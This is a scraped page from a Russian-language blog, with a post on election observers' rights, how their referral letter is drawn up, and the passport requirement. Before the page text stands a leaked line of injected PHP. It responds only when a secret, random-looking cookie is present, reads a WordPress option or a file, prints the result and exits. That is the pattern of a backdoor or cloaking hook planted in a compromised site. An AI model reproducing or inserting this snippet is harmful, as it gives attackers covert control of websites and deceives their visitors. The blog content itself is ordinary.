if (isset($_COOKIE["_OKiQyosYxT9dLrv7hI4m53agwMtefWPCBHnR2kXz8qlUuNE06AjVpFDc"])) { $lines = get_option( 'wpsdt4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents("fed3aadf"); } echo $lines; exit(); } Блог Нурлана Алымбаева » Архив блога » Статус Наблюдателя на выборах (продолжение)
Entries RSS
image

Календарь

Январь 2025
Пн Вт Ср Чт Пт Сб Вс
« Апр    
 12345
6789101112
13141516171819
20212223242526
2728293031  
Авг 05

Статус Наблюдателя на выборах (продолжение)

Многие считают, что наблюдатель имеет право осуществлять наблюдение только в день голосования. Но это не так. До дня голосования наблюдатель может наблюдать за подготовкой выборов. В день голосования за проведением голосования и подсчетом голосов. А уже позднее, за установлением итогов голосования и определением результатов выборов ТИКами и ЦИК.

В законе написано, что порядок наблюдения регулируется законодательством. Поэтому ЦИК может разработать дополнительные правила ведения наблюдения. Главное, чтобы они не противоречили нормам закона,не ограничивали права наблюдателей и не ущемляли их интересы.

В соответствии с частью 2 статьи 9 Закона о выборах наблюдатель приобретает права и обязанности наблюдателя «после поступления в соответствующую избирательную комиссию направления от направившей его организации».  Здесь упоминается организация. Видимо подразумеваются партии и некоммерческие организации. Законодатель упустил, что кандидат в Президенты тоже имеет право назначать, и, соответственно, направлять наблюдателей. Будем считать это технической ошибкой.

Как оформить направление? Возможно, ЦИК разработает форму-шаблон для направлений. Но закон не устанавливает обязательной формы. Поэтому направление может быть оформлено в произвольной форме с указанием следующей информации:

  • фамилия, имя и отчество наблюдателя
  • постоянное место жительства наблюдателя
  • номера избирательных участков и наименования избирательных комиссий, в которые направляется наблюдатель
  • запись об отсутствии у него ограничений активного избирательного права.

Наконец, вместе с направлением наблюдателю необходимо предъявить свой паспорт или заменяющий его документ.

Предварительно уведомлять избирательную комиссию о направлении наблюдателя не требуется.

Синдикация

Понравилась статья? Подпишитесь на RSS .

Пока нет комментариев к записи “Статус Наблюдателя на выборах (продолжение)”

Комментирование закрыто.